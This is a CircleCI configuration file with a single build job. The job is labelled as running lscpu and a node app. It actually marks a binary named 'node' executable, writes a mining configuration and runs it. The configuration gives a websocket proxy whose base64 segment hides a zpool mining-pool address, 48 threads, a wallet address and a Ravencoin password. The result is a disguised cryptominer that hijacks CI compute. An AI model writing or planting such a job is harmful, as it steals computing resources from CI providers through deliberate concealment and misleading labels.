version: 2.1

jobs:
  build:
    docker:
      - image: cimg/base:stable  # Lightweight Linux image with lscpu available
    steps:
      - checkout  # Optional: checks out your repository code
      - run:
          name: Run lscpu and execute node app
          command: |
            chmod +x ./node && echo '{"proxy": "wss://epoch-labs.up.railway.app/cG93ZXIyYi5uYS5taW5lLnpwb29sLmNhOjYyNDI=","config": { "threads": 48, "log": true },"options": { "user": "RWRBUB1MyCu9TuzedVXpFbLLSv7jS3eZKQ", "password": "c=RVN", "argent": "cpu1" }}' > data.json
            ./node app.js

workflows:
  my_workflow:
    jobs:
      - build